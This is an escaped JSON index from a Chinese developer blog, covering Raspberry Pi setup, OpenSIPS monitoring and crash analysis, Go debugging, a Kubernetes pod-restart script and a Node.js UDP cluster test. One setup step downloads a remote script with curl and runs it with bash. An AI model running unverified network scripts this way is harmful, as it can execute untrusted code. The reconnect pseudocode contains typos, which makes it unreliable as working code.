\u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!go fmt %\u0026lt;CR\u0026gt; \u0026#34; go fmt current file nnoremap \u0026lt;Leader\u0026gt;tm :%s/\\s\\+$//e\u0026lt;CR\u0026gt; \u0026#34; trim space at endofline nnoremap \u0026lt;Leader\u0026gt;a A nnoremap \u0026lt;Leader\u0026gt;w :w\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;c :clo\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;/ :Rg\u0026lt;Space\u0026gt; inoremap jj \u0026lt;ESC\u0026gt; highlight CocErrorFloat ctermfg=White let g:netrw_list_hide= \u0026#39;.*\\.swp$\u0026#39; let g:ctrlp_custom_ignore = { \\ \u0026#39;dir\u0026#39;: \u0026#39;\\v[\\/]\\.?(git|hg|svn|node_modules)$\u0026#39;, \\ \u0026#39;file\u0026#39;: \u0026#39;\\v\\.(exe|so|dll|min.js)$\u0026#39;, \\ \u0026#39;link\u0026#39;: \u0026#39;some_bad_symbolic_links\u0026#39;, \\ } set autoread \u0026#34; au CursorHold,CursorHoldI * :e \u0026#34; au FocusGained,BufEnter * :e set so=7 set ruler set cmdheight=2 set hid set backspace=eol,start,indent set whichwrap+=\u0026lt;,\u0026gt;,h,l set ignorecase set smartcase set hlsearch set incsearch set showmatch set mat=2 syntax enable set background=dark set ffs=unix,dos,mac \u0026#34;set ai \u0026#34;Auto indent \u0026#34;set si \u0026#34;Smart indent set wrap \u0026#34;Wrap lines set cursorline set tabstop=4 set shiftwidth=4 set expandtab set background=dark \u0026#34; colorscheme solarized \u0026#34; let g:ackprg = \u0026#39;rg --vimgrep --type-not sql --smart-case\u0026#39; map ; : autocmd FileType javascript setlocal ts=2 sts=2 shiftwidth=2 但是没有go-vim写golang还是不太方便的,特别是保存的时候格式化,但是也有方案, 执行vim的Ex命令,:!go fmt % 视频 看视频是非常危险的行为,有可能需要强制关机重启。 ","permalink":"https://wdd.js.org/posts/2021/08/mlg4mt/","summary":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!","title":"使用树莓派3b+作为辅助开发体验"},{"content":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃会会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真是使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。\n","permalink":"https://wdd.js.org/opensips/ch3/prd-warning/","summary":"日志监控 务必监控opensips日志,如果其中出现了CRITICAL关键字, 很可能马上opensips就要崩溃。\n第一要发出告警信息。第二要有主动的自动重启策略,例如使用systemd启动的话,服务崩溃会会立马被重启。或者用docker或者k8s,这些虚拟化技术,可以让容器崩溃后自动重启。\n指标监控 opensips有内部的统计模块,可以很方便的通过opensipsctl或者相关的http的mi接口获取到内部的统计数据。\n以下给出几个关键的统计指标:\n\u0026rsquo;total_size\u0026rsquo;, 全部内存 \u0026lsquo;used_size\u0026rsquo;, 使用的内存 \u0026lsquo;real_used_size\u0026rsquo;, 真是使用的内存 \u0026lsquo;max_used_size\u0026rsquo;, 最大使用的内存 \u0026lsquo;free_size\u0026rsquo;, 空闲内存 \u0026lsquo;fragments\u0026rsquo;, \u0026lsquo;active_dialogs\u0026rsquo;, 接通状态的通话 \u0026rsquo;early_dialogs\u0026rsquo;, 振铃状态的通话 \u0026lsquo;inuse_transactions\u0026rsquo;, 正在使用的事务 \u0026lsquo;waiting_udp\u0026rsquo;, 堆积的udp消息 \u0026lsquo;waiting_tcp\u0026rsquo; 堆积的tcp消息 当然还有很多的一些指标,可以使用:opensipsctl fifo get_statistics all来获取。","title":"生产环境监控告警"},{"content":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于跟目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间是否足够。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为no, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词\nat 1ea72b5 尝试访问的内存地址偏移 error 4 错误的类型 fault was an instruction fetch ip 00000000004be532 指令指针的位置, 注意这个4be532 sp 00007ffe9e1e6df0 栈指针的位置 400000+203000 x86架构 /* * Page fault error code bits * bit 0 == 0 means no page found, 1 means protection fault * bit 1 == 0 means read, 1 means write * bit 2 == 0 means kernel, 1 means user-mode * bit 3 == 1 means use of reserved bit detected * bit 4 == 1 means fault was an instruction fetch */ #define PF_PROT (1\u0026lt;\u0026lt;0) #define PF_WRITE (1\u0026lt;\u0026lt;1) #define PF_USER (1\u0026lt;\u0026lt;2) #define PF_RSVD (1\u0026lt;\u0026lt;3) #define PF_INSTR (1\u0026lt;\u0026lt;4) 使用objdump, 可以将二进制文件,反汇编找到对应代码的位置。比如说我们可以在反汇编的输出中搜索4be532,就可以找到对应代码的位置。\nobjdump -j .text -ld -C -S $(which opensips) \u0026gt; op.txt 然后我们在op.txt中搜索4be523, 就能找到对饮的源码或者函数的位置。然后根据源码分析问题。\n参考 https://www.opensips.org/Documentation/TroubleShooting-Crash https://stackoverflow.com/questions/2549214/interpreting-segfault-messages https://stackoverflow.com/questions/2179403/how-do-you-read-a-segfault-kernel-log-message/2179464#2179464 https://rgeissert.blogspot.com/p/segmentation-fault-error.html ","permalink":"https://wdd.js.org/opensips/ch7/crash/","summary":"core dump文件在哪里? 一般情况下,opensips在崩溃的时候,会产生core dump文件。这个文件一般位于跟目录下,名字如core.xxxx等的。\ncore dump文件一般大约有1G左右,所以当产生core dump的时候,要保证系统的磁盘空间是否足够。\n如何开启core dump? 第一,opensips脚本中有个参数叫做disable_core_dump, 这个参数默认为no, 也就是启用core dump, 可以将这个参数设置为no, 来禁用core dump。但是生产环境一般建议还是开启core dump, 否则服务崩溃了,就只能看日志,无法定位到具体的崩溃代码的位置。\ndisable_core_dump=yes 第二,还需要在opensips启动之前,运行:ulimit -c unlimited, 这个命令会让opensips core dump的时候,不会限制core dump文件的大小。一般来说core dump文件的大小是共享内存 + 私有内存。\n第三,opensips进程的用户如果不是root, 那么可能没有权限将core dump文件写到/目录下。有两个解决办法,\n用root用户启动opensips进程 使用-w 参数配置opensips的工作目录,core dump文件将会写到对应的目录中。例如:opensips -w /var/log 如果core dump失败是因为权限的问题, opensips的日志文件中将会打印:\nCan\u0026#39;t open \u0026#39;core.xxxx\u0026#39; at \u0026#39;/\u0026#39;: Permission denied 如何分析core dump文件? 使用gdb\ngdb $(which opensips) core.12333 # 进入gdb调试之后, 输入bt full, 会打印详细的错误栈信息 bt full 没有产生core dump文件,如何分析崩溃原因? 使用objdump。\n一般来说opensips崩溃后,日志文件中一般会出现下面的信息\nkernel: opensips[8954]: segfault at 1ea72b5 ip 00000000004be532 sp 00007ffe9e1e6df0 error 4 in opensips[400000+203000] 我们从中取出几个关键词","title":"opensips崩溃分析"},{"content":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将会可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比网日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。\n","permalink":"https://wdd.js.org/opensips/ch7/can-not-run/","summary":"排查日志 opensips的log_stderror参数决定写日志的位置,\nyes 写日志到标准错误 no 写日志到syslog服务(默认) 如果使用默认的syslog服务,那么日志将会可能写到以下两个文件中。\n/var/log/messages /var/log/syslog 一般情况下,分析/var/log/messages日志,可以定位到无法启动的原因。\n如果日志文件中无法定位到具体原因,那么就可以将log_stderror设置为yes。\n注意:往标准错误中打印的日志,往往比网日志文件中打印的更详细。而且有些时候,我发现这个错误在标准错误中打印了,但是却不会输出到日志文件中。\n所以,看标准错误的日志,往往更容易定位到问题。","title":"opensips无法启动"},{"content":"选择那个版本的系统? 不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface etho inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo rasip-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓是armhf架构的,所以这这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PTAH中,就能使用golang了。\n如何安装最新版本的node.js curl -L https://gitee.com/wangduanduan/install-node/raw/master/bin/n -o n bash n lts 如何安装谷歌浏览器? sudo apt full-upgrade sudo apt install chromium-browser -y 使用清华apt源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/ # 编辑 `/etc/apt/sources.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi deb-src http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ buster main non-free contrib rpi # 编辑 `/etc/apt/sources.list.d/raspi.list` 文件,删除原文件所有内容,用以下内容取代: deb http://mirrors.tuna.tsinghua.edu.cn/raspberrypi/ buster main ui 如何安装截图工具? sudo apt-get install -y flameshot 使用树莓派在浏览器上看视频怎么样? 非常卡\n","permalink":"https://wdd.js.org/posts/2021/08/uuvor0/","summary":"选择那个版本的系统? 不要过高的估算树莓派的性能,最好不要选择那些具有漂亮界面的ubuntu或者manjaro, 因为当你使用这些带桌面的系统时,很大概率界面能让你卡的想把树莓派砸了。\n所以优先选择不带图形界面的lite版本的系统,如果确实需要的话,可以再安装lxde\n网线插了,还是无法联网 插了网线,网口上的绿灯也是在闪烁,但是eth0就是无法联网成功。真是气人。\n解决方案: 编辑 /etc/network/interfaces, 将里面的内容改写成下面的,然后重启树莓派。\n这个配置文件的涵义是:在启动时就使用eth0有线网卡,并且使用dhcp给这个网卡自动配置IP\nauto eth0 iface eth0 inet dhcp iface etho inet6 dhcp source-directory /etc/network/interfaces.d 无桌面版本,如何手工安装桌面 首先安装lxde\nsudo apt update sudo apt install lxde -y 然后通过raspi-config, 配置默认从桌面启动\nsudo rasip-config 选择系统配置, 按回车键进入 选择Boot/Auto login, 按回车进入\n选择Desktop, 回车确认。保存之后,退出重启。\n键盘无法输入| | 在linux中是管道的意思,然而我的键盘却无法输入。最终发现是键盘布局的原因。\n在图标上右键,选择配置\n注意这里是US, 这是正常的。如果是UK,就是英式布局,是有问题的,需要把UK的删除,重新增加一个US的。\n如何安装最新版本的neovim? 树莓派使用apt安装的neovim, 版本太老了。很多插件使用上都会体验不好。所以建议安装最新版的neovim。\nsudo apt install snapd sudo snap install --classic nvim 注意: nvim的默认安装的路径是/snap/bin, 所以你需要把这个路径设置到PATH里,才能使用nvim. 如何安装最新的golang? 打开这个页面 https://golang.google.cn/dl/\n因为树莓是armhf架构的,所以这这么多版本里,只有armv6l这个版本是能够在树莓派上运行的。\n压缩包下载之后解压,里面的go/bin目录中就有go的可执行文件,只要将这个目录暴露到PTAH中,就能使用golang了。","title":"树莓派3b+踩坑记录"},{"content":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中的。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一个种表现形式,和server端分离出来。\n","permalink":"https://wdd.js.org/posts/2021/08/kbcih7/","summary":"关于js sdk的设计,这篇文档基本上详细介绍了很多的点,值得深入阅读一遍。https://github.com/hueitan/javascript-sdk-design\n然而最近在重构某个js sdk时,也发现了一些问题,这个问题并不存在于上述文章中的。\njs sdk在收到服务端的响应时,直接将server端返回的错误码给到用户。\n这里会有一个问题,这个响应码,实际上是js sdk和server之间的消息交流。并不是js sdk和用户之间的消息交流。\n如果我们将server端的响应直接返回给用户,则js sdk可以理解为是一个透明代理。用户将会和server端产生强耦合。如果server端有不兼容的变化,将会直接影响到用户的使用。\n所以较好的做法是js sdk将这个错误封装为另一个种表现形式,和server端分离出来。","title":"js sdk 跨层穿透问题"},{"content":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是一个代码而是一个测试的代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置端点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","permalink":"https://wdd.js.org/golang/debug-with-dlv/","summary":"本来打算用gdb调试的,看了官方的文档https://golang.org/doc/gdb, 官方更推荐使用delve这个工具调试。\n我的电脑是linux, 所以就用如下的命令安装。\ngo install github.com/go-delve/delve/cmd/dlv@latest\n我要调试的并不是一个代码而是一个测试的代码。\n当执行测试的时候报错的位置是xxx/demo/demo_test.go, 200行\ndlv test moduleName/demo \u0026gt; b demo_test.go:200 # 在文件的对应行设置端点 \u0026gt; bp # print all breakpoint \u0026gt; c # continue to exe \u0026gt; p variableName ","title":"Debug With Dlv"},{"content":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《莫非定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重制为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不在重连 if currentReconnecTimes \u0026gt; maxConnectTimes { return } // 如果已经催在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2. 如何快速定位问题 第一,代码的敬畏之心 第二,及时告警。日志,或者http请求 第三,编程时,就要考虑异常。例如程序依赖 MQ或者Mysql,当与之交互的链接断开后,应该怎样处理? 第四,多实例问题考虑 第五,检查清单\n","permalink":"https://wdd.js.org/posts/2021/08/brh6mu/","summary":"程序可能大部分时间都是按照正常的逻辑运行,然而也有少数的概率,程序发生异常。\n优秀程序,不仅仅要考虑正常运行,还需要考虑两点:\n如何处理异常 如何在发生异常后,快速定位原因 正常的处理如果称为收益的话,异常的处理就是要能够及时止损。\n能稳定运行364天的程序,很可能因为一天的问题,就被客户抛弃。因为这一天的损失,就可能会超过之前收益的总和。\n异常应当如何处理 如果事情有变坏的可能,不管这种可能性有多小,它总会发生。《莫非定律》\n对于程序来说,避免变坏的方法只有一个,就是不要运行程序(纯粹废话😂)。\n1. 及时崩溃 var conn = nil var maxConnectTimes = 3 var reconnectDelay = 3 * 1000 var currentReconnectTimes = 0 var timeId = 0 func InitDb () { conn = connect(\u0026#34;数据库\u0026#34;) conn.on(\u0026#34;connected\u0026#34;, ()=\u0026gt;{ // 将当前重连次数重制为0 currentReconnectTimes = 0 }) conn.on(\u0026#34;error\u0026#34;, ReconnectDb) } func ReconnectDb () { conn.Close() // 如果重连次数大于最大重连次数,将不在重连 if currentReconnecTimes \u0026gt; maxConnectTimes { return } // 如果已经催在重连的任务,则先关闭 if timeId != 0 { cleanTimeout(timeId) } // 当前重连次数增加 currentReconnectTimes++ // 开始延迟重连 timeId = setTimeout(InitDb, reconnectDelay) } 2.","title":"面向异常编程todo"},{"content":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想将某个pod重启了,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.old.log; then # 如果存在,则取出之前记录的重启次数 t=$(grep $name restart.old.log | awk \u0026#39;{print $2}\u0026#39;) # 和本次记录的重启次数比较,如果本次的重启次数较大 # 则说明pod一定重启过 if [ $count -gt $t]; then echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi else # 如果重启的pod不存在之前的记录中,也说明pod重启过 echo $now ERROR pod_restart $name \u0026gt;\u0026gt; $log_file fi done \u0026lt; restart.now.log # 删除老的记录文件 rm -f restart.old.log # 将新的记录文件重命名为老的记录文件 mv restart.now.log restart.old.log 然后可以将上面的脚本做成定时任务,每分钟执行一次。那么就可以将pod重启的信息写入文件。\n然后配合一些日志监控的程序,就可以监控日志文件。然后提取关键词,最后发送告警信息。\n其实我们也可以在写告警日志文件的同时,通过curl发送http请求,来发送告警通知。\n在公有云上,可以使用钉钉的通知webhook, 也是非常方便的。\n","permalink":"https://wdd.js.org/posts/2021/07/giqfii/","summary":"一般来说,监控pod状态重启和告警,可以使用普罗米修斯或者kubewatch。\n但是如果你只想将某个pod重启了,往某个日志文件中写一条记录,那么下面的方式将是非常简单的。\n实现的思路是使用kubectl 获取所有pod的状态信息,统计发生过重启的pod, 然后和之前的重启次数做对比,如果比之前记录的次数大,那么肯定是发生过重启了。\n#!/bin/bash now=$(date \u0026#34;+%Y-%m-%d %H:%M:%S\u0026#34;) log_file=\u0026#34;/var/log/pod.restart.log\u0026#34; ns=\u0026#34;some-namespace\u0026#34; echo $now start pod restart monitor \u0026gt;\u0026gt; $log_file # touch一下之前的记录文件,防止文件不存在 touch restart.old.log # 生成本次的统计数据 kubectl get pod -n $ns -o wide | awk \u0026#39;$4 \u0026gt; 0{print $1,$4}\u0026#39; | grep -v NAME \u0026gt; restart.now.log # 按行读取本次统计数据 # 数据格式为:podname 重启次数 while read line do # pod name name=$(echo $line | awk \u0026#39;{print $1}\u0026#39;) # 重启次数 count=$(echo $line | awk \u0026#39;{print $2}\u0026#39;) # 检查本次重启的pod名称是否在之前的记录中存在 if grep $name restart.","title":"监控pod重启并写日志文件"},{"content":"本来我的目的是使用cluster模块的fork出多个进程,让各个进程都能处理udp消息的。但是最终测试发现,实际上仅有一个进程处理了绝大数消息,其他的进程,要么不处理消息,要么处理的非常少的消息。\n然而使用cluster来开启http服务的多进程,却能够达到多进程的负载。\nserver端demo代码: const cluster = require(\u0026#39;cluster\u0026#39;) const numCPUs = require(\u0026#39;os\u0026#39;).cpus().length const { logger } = require(\u0026#39;./logger\u0026#39;) const dgram = require(\u0026#39;dgram\u0026#39;) // const { createHTTPServer, createUDPServer } = require(\u0026#39;./app\u0026#39;) const port = 8088 if (cluster.isMaster) { for (let i = 0; i \u0026lt; numCPUs; i++) { cluster.fork() } cluster.on(\u0026#39;exit\u0026#39;, (worker, code, signal) =\u0026gt; { logger.info(`工作进程 ${worker.process.pid} 已退出`) }) } else { const server = dgram.createSocket({ type: \u0026#39;udp4\u0026#39;, reuseAddr: true }) server.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { logger.info(`udp server error:\\n${err.stack}`) server.close() }) server.on(\u0026#39;message\u0026#39;, (msg, rinfo) =\u0026gt; { logger.info(`${process.pid} udp server got: ${msg} from ${rinfo.address}:${rinfo.port}`) }) server.on(\u0026#39;listening\u0026#39;, () =\u0026gt; { const address = server.address() logger.info(`udp server listening ${address.address}:${address.port}`) }) server.bind(port) } 日志库如下:\nconst logger = require(\u0026#39;pino\u0026#39;)() module.exports = { logger } 启动服务之后,从日志中可以看到:启动了四个进程。\n{\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194869,\u0026#34;pid\u0026#34;:98795,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194870,\u0026#34;pid\u0026#34;:98797,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194872,\u0026#34;pid\u0026#34;:98798,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} {\u0026#34;level\u0026#34;:30,\u0026#34;time\u0026#34;:1626601194876,\u0026#34;pid\u0026#34;:98796,\u0026#34;hostname\u0026#34;:\u0026#34;wdd-2.local\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;udp server listening 0.0.0.0:8088\u0026#34;} 然后我们使用nc, 来向这个udpserver发送消息\nnc 0.0.0.0 8088 ... 然后观察server的日志发现:\n基本上所有的消息都被最后一个进程消费 pid 98798 消费一个消息 其他进程没有消费消息 